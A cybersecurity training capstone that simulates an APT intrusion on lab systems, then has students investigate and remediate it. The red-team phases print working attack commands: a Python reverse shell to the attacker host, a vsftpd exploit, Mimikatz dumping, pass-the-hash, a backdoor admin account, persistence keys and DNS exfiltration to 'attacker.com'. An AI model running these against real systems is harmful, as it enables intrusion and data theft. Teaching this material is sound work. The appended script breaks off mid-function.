# CAPSTONE PROJECT: Operation Serpent's Shadow

## Advanced Persistent Threat (APT) Simulation & Incident Response

**Duration**: 24-30 hours

**Points**: 200 (Red Team: 100pts, Blue Team: 100pts)

**Prerequisites**: MOD0-MOD8 completion

**Difficulty**: Advanced

---

## Executive Summary

**Operation Serpent's Shadow** is a comprehensive capstone exercise simulating a sophisticated APT campaign against the Apophis Networking infrastructure. You will first act as the **Red Team** executing a 7-phase attack campaign, then switch roles to become the **Blue Team** investigating and responding to your own intrusion.

This capstone tests your ability to:

- Execute complex multi-stage attacks using techniques from MITRE ATT&CK
- Maintain operational security while achieving attack objectives
- Detect, analyze, and respond to advanced threats
- Document findings in professional incident response reports
- Apply threat intelligence to real-world scenarios

**Scenario**: A nation-state APT group (codename: SERPENT SYNDICATE) has targeted Apophis Networking to steal intellectual property and maintain persistent access. You will emulate this threat actor, then hunt and remediate the intrusion.

---

## Learning Objectives

By completing this capstone, you will demonstrate:

1. **Red Team Skills**:
   - Multi-phase attack chain execution (reconnaissance → persistence)
   - Evasion of security controls (IDS/IPS, EDR simulation)
   - Credential harvesting and lateral movement
   - Data exfiltration techniques
   - OPSEC and TTPs documentation
2. **Blue Team Skills**:
   - Security log analysis across multiple sources (SIEM, firewall, endpoint)
   - Intrusion detection and alert triage
   - Digital forensics (disk, memory, network)
   - Incident response lifecycle (NIST PICERL)
   - Threat intelligence correlation (MITRE ATT&CK mapping)
   - Remediation and hardening recommendations
3. **Professional Skills**:
   - Technical report writing
   - Timeline reconstruction
   - Executive briefing creation
   - Post-incident review documentation

---

## Lab Environment

### Network Topology

```
VLAN 100 (Management)    : 10.10.1.0/24 - Proxmox, pfSense
VLAN 200 (Red Team)      : 10.10.2.0/24 - Kali Linux
VLAN 300 (Blue Team)     : 10.10.3.0/24 - Security Onion
VLAN 400 (Victim Network): 10.10.4.0/24 - Target Systems
```

### Target Systems (VLAN 400)

1. **DC01** (10.10.4.10) - Windows Server 2022 Domain Controller
   - Domain: `apophis.local`
   - Services: AD, DNS, LDAP, Kerberos
2. **WS01** (10.10.4.20) - Windows 10 Workstation (HR Department)
   - Domain-joined
   - User: `hruser` (Domain Users group)
3. **WS02** (10.10.4.21) - Windows 10 Workstation (IT Admin)
   - Domain-joined
   - User: `itadmin` (Domain Admins group - simulated compromised admin)
4. **WEB01** (10.10.4.30) - DVWA Web Server (Ubuntu + Docker)
   - Services: HTTP (80), SSH (22), MySQL (3306)
5. **FILE01** (10.10.4.40) - Metasploitable 2 (Legacy File Server)
   - Services: FTP (21), SMB (445), SSH (22)

### Attack Infrastructure (VLAN 200)

- **Kali Linux** (10.10.2.50)
  - Tools: Nmap, Metasploit, Impacket, BloodHound, Responder, Mimikatz

### Monitoring Infrastructure (VLAN 300)

- **Security Onion** (10.10.3.100)
  - SIEM: Kibana/Elasticsearch
  - IDS/IPS: Suricata
  - Network Forensics: Zeek (Bro), PCAP

---

## PHASE 1: RED TEAM OPERATION (100 Points)

### Pre-Engagement Checklist

Before starting the attack campaign:

1. **Create Attack VM Snapshot**: `Kali_PreAttack_Snapshot`
2. **Create Target VM Snapshots**: Snapshot all VLAN 400 systems
3. **Verify Network Isolation**: Confirm VLAN segmentation and firewall rules
4. **Start Security Onion**: Ensure all sensors are running
5. **Create Attack Log Directory**:

   ```bash
   mkdir -p ~/capstone/red_team/{logs,screenshots,loot,exfil}
   script ~/capstone/red_team/logs/attack_$(date +%Y%m%d_%H%M%S).log
   ```

---

### Attack Phase 1: External Reconnaissance (10 Points)

**Objective**: Map the external attack surface without triggering alerts.

**TTPs**: MITRE ATT&CK - TA0043 (Reconnaissance)

**Tasks**:

1. **Passive Reconnaissance**:

   ```bash
   # Simulated OSINT gathering (document in report)
   echo "apophis.local" > targets.txt
   echo "10.10.4.0/24" >> targets.txt

   # DNS enumeration (if DNS is exposed)
   dig @10.10.4.10 apophis.local ANY
   dig @10.10.4.10 apophis.local AXFR
   ```

2. **Active Network Scanning**:

   ```bash
   # Output directory for the -oA result files
   mkdir -p recon

   # Stealthy host discovery (SYN scan, no ICMP)
   sudo nmap -sS -Pn -T2 --max-retries 1 -oA recon/syn_scan 10.10.4.0/24

   # Service enumeration on discovered hosts
   sudo nmap -sV -sC -p- --open -T3 -oA recon/service_scan 10.10.4.0/24
   ```

3. **SMB/NetBIOS Enumeration**:

   ```bash
   # Enumerate SMB shares and users
   enum4linux -a 10.10.4.10 | tee recon/enum4linux_dc01.txt
   smbclient -L //10.10.4.40 -N | tee recon/smbshares_file01.txt
   ```

**Deliverables**:
- [ ] Nmap scan results (XML + screenshot)
- [ ] Network topology diagram with discovered hosts/services
- [ ] Target prioritization list (justify choices)

**Assessment Criteria** (10pts):
- Comprehensive service enumeration (5pts)
- Evasion techniques documented (3pts)
- Target analysis and prioritization (2pts)

---

### Attack Phase 2: Initial Access (15 Points)

**Objective**: Gain initial foothold on the victim network.

**TTPs**: MITRE ATT&CK - TA0001 (Initial Access)

**Techniques**: T1190 (Exploit Public-Facing Application), T1078 (Valid Accounts)

**Scenario**: You discovered FILE01 (Metasploitable 2) running vulnerable vsftpd 2.3.4.

**Tasks**:

1. **Exploit vsftpd Backdoor** (from MOD3):

   ```bash
   msfconsole -q
   use exploit/unix/ftp/vsftpd_234_backdoor
   set RHOSTS 10.10.4.40
   set PAYLOAD cmd/unix/interact
   exploit
   ```

2. **Establish Meterpreter Session**:

   ```bash
   # Upgrade to full Meterpreter shell
   # (Use MSFVenom payload + upload via FTP if needed)
   python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.2.50",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
   ```

3. **System Enumeration**:

   ```bash
   # Gather system information
   uname -a
   id
   cat /etc/passwd
   cat /etc/shadow 2>/dev/null
   netstat -tulpn
   ls -la /home
   ```

**Deliverables**:
- [ ] Screenshot of successful exploit
- [ ] Output of system enumeration commands
- [ ] Screenshot showing `whoami` and `ifconfig` from victim

**Assessment Criteria** (15pts):
- Successful initial access (10pts)
- System enumeration completeness (3pts)
- Shell stability and upgrade (2pts)

---

### Attack Phase 3: Credential Access (15 Points)

**Objective**: Harvest credentials to enable lateral movement.

**TTPs**: MITRE ATT&CK - TA0006 (Credential Access)

**Techniques**: T1003 (OS Credential Dumping), T1110 (Brute Force)

**Tasks**:

1. **Linux Credential Harvesting** (FILE01):

   ```bash
   # Dump /etc/shadow (if accessible)
   cat /etc/shadow

   # Search for credentials in config files
   grep -ri password /var/www/html 2>/dev/null
   grep -ri password /home 2>/dev/null
   find / -name "*pass*" -type f 2>/dev/null | head -20
   ```

2. **Password Cracking**:

   ```bash
   # Save hashes and crack with John
   unshadow /tmp/passwd /tmp/shadow > /tmp/unshadowed.txt
   john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/unshadowed.txt
   john --show /tmp/unshadowed.txt
   ```

3. **Web Application Credential Extraction** (WEB01):

   ```bash
   # SQL injection to dump DVWA users (MOD7 techniques)
   sqlmap -u "http://10.10.4.30/vulnerabilities/sqli/?id=1&Submit=Submit#" \
     --cookie="PHPSESSID=" \
     --dump -D dvwa -T users
   ```
4. **Network Credential Sniffing** (Advanced):

   ```bash
   # Responder for NTLM hash capture (if AD communication observed)
   sudo responder -I eth0 -wrf
   ```

**Deliverables**:
- [ ] Cracked password list (at least 3 accounts)
- [ ] Screenshot of John the Ripper output
- [ ] Captured NTLM hashes (if applicable)
- [ ] SQL injection dump results

**Assessment Criteria** (15pts):
- Multiple credential sources exploited (7pts)
- Successful password cracking (5pts)
- Documentation of credential storage locations (3pts)

---

### Attack Phase 4: Lateral Movement (20 Points)

**Objective**: Pivot from initial foothold to domain-joined systems.

**TTPs**: MITRE ATT&CK - TA0008 (Lateral Movement)

**Techniques**: T1021.002 (SMB/Windows Admin Shares), T1550.002 (Pass the Hash)

**Scenario**: You obtained credentials for `itadmin` and need to access WS02.

**Tasks**:

1. **SMB Authentication Testing**:

   ```bash
   # Test credentials against domain systems
   crackmapexec smb 10.10.4.0/24 -u itadmin -p 'P@ssw0rd123' --shares
   crackmapexec smb 10.10.4.0/24 -u itadmin -p 'P@ssw0rd123' --local-auth
   ```

2. **PSExec Lateral Movement**:

   ```bash
   # Gain shell on WS02 using Impacket
   impacket-psexec 'apophis.local/itadmin:P@ssw0rd123@10.10.4.21'

   # Alternative: WMIExec
   impacket-wmiexec 'apophis.local/itadmin:P@ssw0rd123@10.10.4.21'
   ```

3. **Kerberoasting Attack** (MOD5 techniques):

   ```bash
   # Request service tickets for cracking
   impacket-GetUserSPNs 'apophis.local/itadmin:P@ssw0rd123' -dc-ip 10.10.4.10 -request

   # Crack TGS tickets
   hashcat -m 13100 tgs_tickets.txt /usr/share/wordlists/rockyou.txt --force
   ```

4. **BloodHound Enumeration** (Advanced):

   ```bash
   # Collect AD data
   bloodhound-python -d apophis.local -u itadmin -p 'P@ssw0rd123' \
     -ns 10.10.4.10 -c all

   # Import into BloodHound GUI and analyze shortest path to Domain Admins
   ```

**Deliverables**:
- [ ] Screenshot of successful lateral movement to WS02
- [ ] CrackMapExec output showing access to multiple systems
- [ ] Kerberoast TGS tickets (if obtained)
- [ ] BloodHound attack path graph (screenshot)

**Assessment Criteria** (20pts):
- Successful lateral movement to domain system (10pts)
- Use of multiple techniques (5pts)
- Active Directory enumeration completeness (5pts)

---

### Attack Phase 5: Privilege Escalation & Persistence (20 Points)

**Objective**: Escalate to Domain Admin and establish persistent access.

**TTPs**: MITRE ATT&CK - TA0004 (Privilege Escalation), TA0003 (Persistence)

**Techniques**: T1068 (Exploitation for Privilege Escalation), T1136 (Create Account), T1547 (Boot/Logon Autostart)

**Tasks**:

1. **Mimikatz Credential Dumping** (WS02):

   ```powershell
   # On compromised WS02 system
   mimikatz.exe
   privilege::debug
   sekurlsa::logonpasswords
   lsadump::sam
   lsadump::secrets
   ```

2. **Pass-the-Hash to Domain Controller**:

   ```bash
   # Use captured NTLM hash to access DC01
   impacket-psexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'apophis.local/Administrator@10.10.4.10'
   ```

3. **Create Backdoor Domain Account**:

   ```powershell
   # On DC01
   net user backdoor P@ssw0rd123! /add /domain
   net group "Domain Admins" backdoor /add /domain
   net user backdoor
   ```

4. **Scheduled Task Persistence** (WS02):

   ```powershell
   # Create scheduled task for Meterpreter callback
   schtasks /create /tn "Windows Update Check" /tr "C:\Windows\Temp\update.exe" /sc onlogon /ru SYSTEM /f
   ```
5. **Registry Persistence** (Alternative):

   ```powershell
   # Add Run key
   reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v SecurityUpdate /t REG_SZ /d "C:\Windows\Temp\update.exe" /f
   ```

**Deliverables**:
- [ ] Screenshot of Mimikatz credential dump
- [ ] Proof of Domain Admin access (screenshot of `whoami /groups` on DC01)
- [ ] Backdoor account creation evidence
- [ ] Persistence mechanism documentation (scheduled task/registry)

**Assessment Criteria** (20pts):
- Domain Admin privileges achieved (10pts)
- Credential dumping success (5pts)
- Persistence mechanisms installed (3pts)
- Stealth considerations documented (2pts)

---

### Attack Phase 6: Data Exfiltration (10 Points)

**Objective**: Locate and exfiltrate sensitive data.

**TTPs**: MITRE ATT&CK - TA0010 (Exfiltration)

**Techniques**: T1041 (Exfiltration Over C2 Channel), T1048 (Exfiltration Over Alternative Protocol)

**Tasks**:

1. **Data Discovery**:

   ```powershell
   # Search for sensitive files
   Get-ChildItem -Path C:\ -Include *.docx,*.xlsx,*.pdf -Recurse -ErrorAction SilentlyContinue |
       Where-Object { $_.Length -lt 10MB } |
       Select-Object FullName, Length

   # Search for "confidential" or "password" in file contents
   findstr /si "password" C:\Users\*.txt C:\Users\*.docx
   ```

2. **Exfiltration via HTTP**:

   ```bash
   # On Kali (setup listener)
   sudo python3 -m http.server 8080

   # On victim (download via curl/wget)
   certutil -urlcache -f http://10.10.2.50:8080/file.zip C:\Windows\Temp\file.zip
   ```

3. **DNS Exfiltration** (Stealth technique):

   ```powershell
   # Encode data in DNS queries (simulate)
   $data = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("SECRET_DATA"))
   nslookup "$data.attacker.com" 10.10.2.50
   ```

4. **Simulate Intellectual Property Theft**:

   ```powershell
   # Create fake sensitive document on DC01
   echo "Apophis Networking - Proprietary Research Data" > C:\Shares\Research\IP_Data.txt

   # Compress and exfiltrate
   Compress-Archive -Path C:\Shares\Research\* -DestinationPath C:\Windows\Temp\exfil.zip

   # Transfer using Meterpreter 'download' command
   ```

**Deliverables**:
- [ ] List of discovered sensitive files (screenshot)
- [ ] Screenshot of successful exfiltration
- [ ] Network capture showing exfiltration traffic (PCAP)
- [ ] Exfiltrated file samples (in `~/capstone/red_team/exfil/`)

**Assessment Criteria** (10pts):
- Data discovery methodology (4pts)
- Successful exfiltration (4pts)
- Stealth techniques used (2pts)

---

### Attack Phase 7: Red Team Reporting (10 Points)

**Objective**: Document the attack chain for Blue Team analysis.

**Tasks**:

1. **Create Attack Timeline**:
   - Document each phase with timestamps
   - Include all commands executed
   - Note which actions likely triggered alerts
2. **MITRE ATT&CK Mapping**:
   - Map each technique to ATT&CK framework
   - Create coverage matrix (Tactics vs Techniques)
   - Export for dashboard integration
3. **Indicators of Compromise (IOCs)**:
   - File paths created: `C:\Windows\Temp\update.exe`
   - Registry keys modified: `HKLM\...\Run\SecurityUpdate`
   - Network connections: `10.10.2.50:4444` (Meterpreter)
   - User accounts created: `backdoor`
   - Scheduled tasks: `Windows Update Check`
4. **Red Team Report Structure**:

   ```markdown
   # Red Team Report: Operation Serpent's Shadow

   ## Executive Summary
   - Attack duration: X hours
   - Systems compromised: 5/5 (100%)
   - Privileges gained: Domain Admin
   - Data exfiltrated: XX MB

   ## Attack Chain
   [Phase 1] External Recon →
   [Phase 2] Initial Access (FILE01) →
   [Phase 3] Credential Harvesting →
   [Phase 4] Lateral Movement (WS02) →
   [Phase 5] Domain Admin (DC01) + Persistence →
   [Phase 6] Data Exfiltration

   ## Techniques Used
   [MITRE ATT&CK mapping table]

   ## Indicators of Compromise
   [IOC list]

   ## Detection Gaps Identified
   [Where Blue Team should have caught you]
   ```

**Deliverables**:
- [ ] Complete Red Team report (PDF format)
- [ ] MITRE ATT&CK Navigator JSON file
- [ ] IOC list (CSV format)
- [ ] Complete command log from `script` session

**Assessment Criteria** (10pts):
- Report completeness and professionalism (5pts)
- Accurate MITRE ATT&CK mapping (3pts)
- Comprehensive IOC documentation (2pts)

---

## PHASE 2: BLUE TEAM OPERATION (100 Points)

### Pre-Investigation Checklist

Before starting the Blue Team phase:

1. **Preserve Evidence**:
   - Create forensic snapshots of all compromised VMs
   - Copy Security Onion logs: `/nsm/sensor_data/`
   - Export SIEM data from Kibana (last 24 hours)
2. **Establish Blue Team Workspace**:

   ```bash
   mkdir -p ~/capstone/blue_team/{forensics,pcaps,logs,reports,timeline}
   script ~/capstone/blue_team/logs/investigation_$(date +%Y%m%d_%H%M%S).log
   ```

3. **Review Red Team Report** (IOCs only - not methodology yet):
   - Extract IOC list to use as detection baseline
   - Do NOT review attack methodology - simulate real-world blind investigation

---

### Investigation Phase 1: Detection & Triage (15 Points)

**Objective**: Identify security alerts and determine scope of compromise.

**Tasks**:

1. **SIEM Alert Review** (Security Onion Kibana):

   ```kql
   # High severity alerts in last 24 hours (set the Kibana time picker to
   # "Last 24 hours"; KQL has no pipe/stats operators, so group the results
   # by rule.name, source.ip and destination.ip in a Lens visualization)
   event.severity: high OR event.severity: critical

   # Suspicious network connections to VLAN 200
   # (wildcards do not apply to ip-typed fields, so use a range)
   destination.ip >= 10.10.2.0 AND destination.ip <= 10.10.2.255 AND event.category: network

   # Authentication anomalies (group by user.name and source.ip in a visualization)
   event.category: authentication AND event.outcome: failure
   ```

2. **Suricata Alert Analysis**:

   ```bash
   # Review IDS alerts
   sudo grep -E "ET|MALWARE|EXPLOIT" /var/log/suricata/fast.log

   # Extract unique alert signatures (eve.json also holds flow/dns/http
   # records, so select alert events first)
   jq -r 'select(.event_type == "alert") | .alert.signature' /var/log/suricata/eve.json | sort -u
   ```

3. **Zeek Log Analysis**:

   ```bash
   # Identify unusual connections
   zeek-cut id.orig_h id.resp_h id.resp_p proto < /nsm/zeek/logs/current/conn.log |
       sort | uniq -c | sort -rn | head -20

   # DNS queries to suspicious domains
   zeek-cut query answers < /nsm/zeek/logs/current/dns.log | grep -v ".local"
   ```

4. **Initial Hypothesis**:
   - Document which systems appear compromised
   - Identify likely attack entry point
   - Estimate timeline of initial compromise

**Deliverables**:
- [ ] Top 10 critical alerts (screenshot)
- [ ] Network connection matrix (source → dest mapping)
- [ ] Initial incident triage report (1-2 pages)

**Assessment Criteria** (15pts):
- Alert prioritization and triage (7pts)
- Correct identification of compromised systems (5pts)
- Timeline accuracy (3pts)

---

### Investigation Phase 2: Network Forensics (15 Points)

**Objective**: Analyze network traffic to reconstruct attack activities.

**Tasks**:

1. **PCAP Analysis** (Wireshark):

   ```bash
   # Export suspicious traffic from Security Onion
   # (tcpdump -r reads a single file, so filter each daily PCAP and merge the parts)
   for f in /nsm/sensor_data/securityonion-eth1/dailylogs/*.pcap; do
       sudo tcpdump -r "$f" 'host 10.10.2.50 or host 10.10.4.40' -w "/tmp/part_$(basename "$f")"
   done
   mergecap -w ~/capstone/blue_team/pcaps/attack_traffic.pcap /tmp/part_*.pcap
   ```

2. **Identify C2 Communication**:
   - Filter for connections to Kali (10.10.2.50)
   - Look for Meterpreter beacons (TCP 4444, HTTP reverse shells)
   - Identify exfiltration channels
3. **Extract Artifacts from PCAP**:

   ```bash
   # Export HTTP objects (potential exfil data)
   tshark -r attack_traffic.pcap --export-objects http,/tmp/http_objects/

   # SMB file transfers (smb2.cmd 0x0009 = WRITE)
   tshark -r attack_traffic.pcap -Y "smb2.cmd == 0x0009" -T fields \
     -e frame.time -e ip.src -e ip.dst -e smb2.filename
   ```

4. **Protocol Analysis**:
   - Document SMB sessions (lateral movement)
   - Kerberos TGT/TGS requests (Kerberoasting)
   - DNS queries (potential DNS tunneling)
   - HTTP POST requests (data exfiltration)

**Deliverables**:
- [ ] Annotated PCAP with attack traffic highlighted
- [ ] Screenshot of C2 communication in Wireshark
- [ ] Extracted artifacts (HTTP objects, SMB files)
- [ ] Network forensics report (protocol breakdown)

**Assessment Criteria** (15pts):
- Correct identification of attack traffic (7pts)
- C2 channel analysis (5pts)
- Artifact extraction completeness (3pts)

---

### Investigation Phase 3: Host Forensics (20 Points)

**Objective**: Perform disk and memory forensics on compromised systems.

**Tasks**:

1. **Disk Forensics with Autopsy** (FILE01 - Initial Access Point):

   ```bash
   # Create disk image
   sudo dd if=/dev/sda of=~/capstone/blue_team/forensics/file01.dd bs=4M status=progress

   # Import into Autopsy and analyze:
   # - Timeline of file modifications
   # - Deleted files recovery
   # - Web history / bash history
   # - Malware artifacts
   ```

2. **Memory Forensics with Volatility** (WS02 - Lateral Movement Target):

   ```bash
   # Capture memory dump (from Proxmox or use FTK Imager)

   # Analyze with Volatility 3
   python3 vol.py -f ws02_memory.raw windows.info
   python3 vol.py -f ws02_memory.raw windows.pslist
   python3 vol.py -f ws02_memory.raw windows.netscan
   python3 vol.py -f ws02_memory.raw windows.malfind
   # Replace <PID> with a suspicious process identified by pslist/malfind
   python3 vol.py -f ws02_memory.raw windows.dumpfiles --pid <PID>
   ```

3. **Windows Event Log Analysis** (DC01):

   ```powershell
   # Security event logs (authentication)
   Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=4624 or EventID=4625 or EventID=4672]]" |
       Where-Object { $_.TimeCreated -gt (Get-Date).AddHours(-24) } |
       Select-Object TimeCreated, Id, Message

   # Logon events (type 3 = network, type 10 = remote interactive)
   Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} |
       Where-Object { $_.Properties[8].Value -eq 3 -or $_.Properties[8].Value -eq 10 }

   # Account creation events
   Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4720}
   ```

4. **Registry Forensics** (Persistence Mechanisms):

   ```powershell
   # Check Run keys
   Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"

   # Scheduled tasks
   Get-ScheduledTask | Where-Object { $_.Principal.UserId -eq "SYSTEM" } |
       Select-Object TaskName, TaskPath, Date

   # Services
   Get-Service | Where-Object { $_.StartType -eq "Automatic" -and $_.Status -eq "Running" }
   ```

**Deliverables**:
- [ ] Autopsy case report with timeline
- [ ] Volatility analysis results (processes, network connections)
- [ ] Windows Event Log summary (authentication anomalies)
- [ ] Registry forensics findings (persistence mechanisms)

**Assessment Criteria** (20pts):
- Disk forensics completeness (7pts)
- Memory forensics quality (7pts)
- Event log analysis (4pts)
- Persistence mechanism identification (2pts)

---

### Investigation Phase 4: Incident Response (NIST PICERL) (20 Points)

**Objective**: Execute full incident response lifecycle.

**NIST PICERL Framework**:

1. **Preparation** (Already completed - lab setup)
2. **Identification** (Completed in Phase 1)
3. **Containment** (Short-term and Long-term)
4. **Eradication** (Remove attacker presence)
5. **Recovery** (Restore services)
6. **Lessons Learned** (Post-incident review)

**Tasks**:
1. **Containment Actions**:

   ```bash
   # Short-term: Isolate compromised systems
   # On pfSense, block Kali IP (the "blocklist" table must exist in the ruleset)
   pfctl -t blocklist -T add 10.10.2.50
   ```

   ```powershell
   # On DC01: disable backdoor account
   net user backdoor /active:no /domain

   # On WS02: kill suspicious processes
   Get-Process | Where-Object { $_.Path -like "*\Temp\*" } | Stop-Process -Force
   ```

2. **Eradication**:

   ```powershell
   # Remove malware artifacts
   Remove-Item "C:\Windows\Temp\update.exe" -Force

   # Remove persistence mechanisms
   schtasks /delete /tn "Windows Update Check" /f
   reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v SecurityUpdate /f

   # Delete backdoor account
   net user backdoor /delete /domain

   # Reset compromised accounts
   net user itadmin NewP@ssw0rd123! /domain
   ```

3. **Recovery**:

   ```powershell
   # Restore from clean snapshots (if available)
   # Rebuild compromised systems

   # Verify AD integrity
   dcdiag /v > dcdiag_output.txt
   repadmin /replsummary

   # Restrict the domain's Kerberos encryption types to AES
   # (this does not reset the krbtgt keys; reset that account separately)
   ksetup /setenctypeattr apophis.local AES256-CTS-HMAC-SHA1-96
   ```

4. **Hardening Recommendations**:
   - Enable LSASS protection: `Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL" -Value 1`
   - Implement tiered admin model
   - Deploy EDR solution (simulate with Sysmon)
   - Update firewall rules (segment VLANs further)

**Deliverables**:
- [ ] Containment action log (timestamped)
- [ ] Eradication checklist (completed tasks)
- [ ] System recovery documentation
- [ ] Hardening recommendations report (5+ actionable items)

**Assessment Criteria** (20pts):
- Proper NIST PICERL execution (10pts)
- Completeness of eradication (5pts)
- Quality of hardening recommendations (5pts)

---

### Investigation Phase 5: Threat Intelligence & Attribution (15 Points)

**Objective**: Map attack to MITRE ATT&CK and perform threat actor profiling.

**Tasks**:

1. **MITRE ATT&CK Mapping**:
   - Create spreadsheet mapping observed TTPs to ATT&CK techniques
   - Use ATT&CK Navigator to visualize coverage
   - Identify gaps in detection coverage
2. **Threat Actor Profiling**:

   ```markdown
   # Threat Actor: SERPENT SYNDICATE (Simulated APT)

   **Sophistication Level**: Advanced

   **Observed TTPs**:
   - Initial Access: T1190 (Exploit Public-Facing Application)
   - Credential Access: T1003 (OS Credential Dumping)
   - Lateral Movement: T1021.002 (SMB/Windows Admin Shares)
   - Persistence: T1136 (Create Account), T1053 (Scheduled Task)
   - Exfiltration: T1041 (C2 Channel)

   **Tools Used**:
   - Metasploit Framework
   - Impacket suite
   - Mimikatz
   - Custom PowerShell scripts

   **Targeting**: Intellectual property theft, persistent access

   **Comparison**: Similar to APT29 (Cozy Bear) - use of living-off-the-land techniques
   ```

3. **IOC Generation for Threat Intelligence Platforms**:

   ```csv
   indicator,type,severity,context
   10.10.2.50,ipv4,high,C2 Server
   update.exe,filename,critical,Persistent malware
   backdoor,username,critical,Rogue domain account
   "Windows Update Check",scheduled_task,high,Persistence mechanism
   C:\Windows\Temp\*,filepath,medium,Malware staging directory
   ```

4. **Dashboard Integration** (MOD8 Link):
   - Export MITRE heatmap JSON to `dashboard/src/data/live/mitre_coverage.json`
   - Update threat feed with real IOCs
   - Visualize attack timeline in Incident Tracker component

**Deliverables**:
- [ ] MITRE ATT&CK Navigator layer file (JSON)
- [ ] Threat actor profile report (2-3 pages)
- [ ] IOC list in STIX format (or CSV)
- [ ] Dashboard integration (screenshot of updated heatmap)

**Assessment Criteria** (15pts):
- Accurate MITRE ATT&CK mapping (7pts)
- Threat actor profiling quality (5pts)
- IOC quality and completeness (3pts)

---

### Investigation Phase 6: Final IR Report (15 Points)

**Objective**: Create comprehensive incident response report for executive leadership.
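The following Python script is an added example, not part of the capstone's own materials: it does the evidence merging that Investigation Phases 1, 5 and 6 ask for, parsing constructed Suricata eve.json, Zeek conn.log and Windows Security event samples, flagging the IOCs from the Red Team report, sorting everything into the report's timeline table format, and emitting an ATT&CK Navigator layer. The event-to-technique mapping, the Navigator version numbers, and every sample record are assumptions made for this example.

```python
# Added example for the capstone (not course-supplied code): merge evidence from
# Suricata eve.json, Zeek conn.log and Windows Security events into the IR report's
# timeline table and an ATT&CK Navigator layer. All sample records are constructed.
import ipaddress
import json
from datetime import datetime, timezone

RED_TEAM_VLAN = ipaddress.ip_network("10.10.2.0/24")
HOSTS = {"10.10.4.10": "DC01", "10.10.4.20": "WS01", "10.10.4.21": "WS02",
         "10.10.4.30": "WEB01", "10.10.4.40": "FILE01", "10.10.2.50": "KALI"}
# IOC baseline taken from the Red Team report section of this capstone
IOC_USERS = {"backdoor"}
IOC_TASKS = {"Windows Update Check"}
IOC_C2 = ("10.10.2.50", 4444)

# Constructed Suricata eve.json lines (one JSON object per line); the flow record
# shows why non-alert event types must be filtered out
SURICATA_EVE = "\n".join([
    json.dumps({"timestamp": "2026-02-10T14:23:05.000000+0000", "event_type": "flow",
                "src_ip": "10.10.4.20", "dest_ip": "10.10.4.10", "dest_port": 53, "proto": "UDP"}),
    json.dumps({"timestamp": "2026-02-10T14:23:10.000000+0000", "event_type": "alert",
                "src_ip": "10.10.2.50", "dest_ip": "10.10.4.40", "dest_port": 21, "proto": "TCP",
                "alert": {"signature": "CONSTRUCTED SCAN SYN sweep", "severity": 2}}),
])
# Constructed Zeek conn.log rows in zeek-cut order: ts id.orig_h id.orig_p id.resp_h id.resp_p proto
ZEEK_CONN = ("1770734700.0\t10.10.4.40\t41234\t10.10.2.50\t4444\ttcp\n"
             "1770734760.0\t10.10.4.20\t50222\t10.10.4.10\t389\ttcp\n")
# Constructed Windows Security events, flattened the way a Get-WinEvent export might be
# (4698 "scheduled task created" is a real Security event ID not used elsewhere in the capstone)
WIN_EVENTS = [
    {"TimeCreated": "2026-02-10T14:58:00Z", "Id": 4624, "Computer": "WS02",
     "TargetUserName": "itadmin", "LogonType": 3, "IpAddress": "10.10.4.40"},
    {"TimeCreated": "2026-02-10T15:10:00Z", "Id": 4720, "Computer": "DC01",
     "TargetUserName": "backdoor", "SubjectUserName": "itadmin"},
    {"TimeCreated": "2026-02-10T15:12:00Z", "Id": 4698, "Computer": "WS02",
     "TaskName": "\\Windows Update Check", "SubjectUserName": "itadmin"},
]

def host(ip):
    return HOSTS.get(ip, ip)

def parse_suricata(text):
    """Keep only alert records. An alert against FILE01's FTP port is tagged T1190,
    the capstone's initial-access technique (a mapping assumed for this example)."""
    events = []
    for line in text.splitlines():
        rec = json.loads(line)
        if rec.get("event_type") != "alert":
            continue
        ts = datetime.strptime(rec["timestamp"][:19], "%Y-%m-%dT%H:%M:%S")
        tech = "T1190" if rec["dest_port"] == 21 else None
        events.append((ts, f"Suricata: {rec['alert']['signature']} from {rec['src_ip']}",
                       host(rec["dest_ip"]), "IDS alert fired", tech))
    return events

def parse_zeek_conn(text):
    """Flag connections whose responder sits in the Red Team VLAN; the known C2 pair
    is tagged T1041, any other outbound channel T1048 (both from the capstone)."""
    events = []
    for row in text.splitlines():
        ts, orig, _, resp, resp_p, proto = row.split("\t")
        if ipaddress.ip_address(resp) not in RED_TEAM_VLAN:
            continue
        when = datetime.fromtimestamp(float(ts), tz=timezone.utc).replace(tzinfo=None)
        tech = "T1041" if (resp, int(resp_p)) == IOC_C2 else "T1048"
        events.append((when, f"Zeek: {proto} {orig} -> {resp}:{resp_p}", host(orig),
                       "Outbound to Red Team VLAN", tech))
    return events

def parse_win_events(records):
    """Map the Security event IDs to the techniques listed in the threat actor profile."""
    events = []
    for r in records:
        when = datetime.strptime(r["TimeCreated"], "%Y-%m-%dT%H:%M:%SZ")
        if r["Id"] == 4624 and r.get("LogonType") == 3:
            events.append((when, f"Network logon {r['TargetUserName']} from {host(r['IpAddress'])}",
                           r["Computer"], "Lateral movement suspected", "T1021.002"))
        elif r["Id"] == 4720:
            flag = "IOC match" if r["TargetUserName"] in IOC_USERS else "Review"
            events.append((when, f"Account created: {r['TargetUserName']}", r["Computer"], flag, "T1136"))
        elif r["Id"] == 4698:
            name = r["TaskName"].lstrip("\\")
            flag = "IOC match" if name in IOC_TASKS else "Review"
            events.append((when, f"Scheduled task created: {name}", r["Computer"], flag, "T1053"))
    return events

def build_timeline():
    """Every event is (timestamp, description, system, action, technique), sorted by time."""
    events = parse_suricata(SURICATA_EVE) + parse_zeek_conn(ZEEK_CONN) + parse_win_events(WIN_EVENTS)
    return sorted(events, key=lambda e: e[0])

def render_table(events):
    """Markdown table in the column layout the IR report template uses."""
    rows = ["| Timestamp | Event | System | Action |", "|-----------|-------|--------|--------|"]
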